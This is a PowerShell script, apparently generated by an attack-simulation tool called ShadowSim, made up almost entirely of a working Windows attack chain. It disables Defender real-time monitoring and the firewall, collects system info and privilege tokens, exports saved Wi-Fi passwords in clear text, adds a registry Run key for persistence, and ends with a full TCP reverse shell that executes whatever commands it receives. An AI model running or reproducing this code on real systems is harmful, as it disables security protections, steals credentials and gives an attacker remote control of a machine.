# Generated by ShadowSim
# Timestamp: 2025-08-03T16:30:36.624573

if ($PSVersionTable.PSVersion.Major -lt 5) { exit }

# --- Defender Bypass ---
Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath 'C:\Users\Public'

# --- Firewall Disable ---
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# --- Recon ---
systeminfo | Out-File C:\Users\Public\sysinfo.txt
whoami /all | Out-File C:\Users\Public\tokens.txt
netsh wlan export profile key=clear folder=C:\Users\Public

# --- Persistence Setup ---
$path = "C:\Users\Public\script.ps1"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ShadowSimTask" -Value "powershell -ExecutionPolicy Bypass -File $path" -PropertyType String -Force

# --- Reverse Shell ---
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
  $sendback = (iex $data 2>&1 | Out-String )
  $sendback2 = $sendback + "PS " + (pwd).Path + "> "
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
  $stream.Write($sendbyte,0,$sendbyte.Length)
  $stream.Flush()
}
$client.Close()

# --- Simulated User Actions ---